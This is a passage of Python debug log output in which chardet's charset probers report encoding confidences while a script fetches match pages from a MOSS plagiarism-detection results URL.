0.01\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.0\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5307566789403784\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5585143132172369\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5293844120084262\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match95-top.html\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match95-0.html\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match95-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match94-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match94-0.html\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5396503419910391\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match93-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match94-1.html\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match93-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match93-1.html\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.9690625\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 25008\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 32298\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 24995\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 31646\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 32285\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 25008\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 32298\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 31633\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 24995\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 31646\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 32285\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 24995\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 31633\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 32285\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 24996\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 31633\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 31634\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 32286\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 24995\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 31633\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 32285\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5407073027958034\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.9690625\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5293844120084262\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5315932050054211\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5270766988253114\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match90-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match90-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match90-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match88-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match88-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match88-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match92-top.html\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match92-0.html\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match92-1.html\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.532910447440124\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.99\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 19290\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 19277\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 19085\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 19290\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 21642\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 19072\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 19277\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 19085\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 21629\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 19277\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 19072\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 21642\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 19278\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 19072\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 21629\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 19277\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 19073\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 21629\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 19072\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 21630\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 21629\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5439906528552106\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5450726049544079\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5322320954044778\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match96-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match96-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match96-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match97-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match97-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match97-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match98-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match98-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match98-1.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 17291\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 21286\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 17278\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 17291\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 21273\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 17278\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 21286\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 21273\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 17278\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 21273\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 17279\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 21274\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 17278\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 21273\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.505\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.505\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 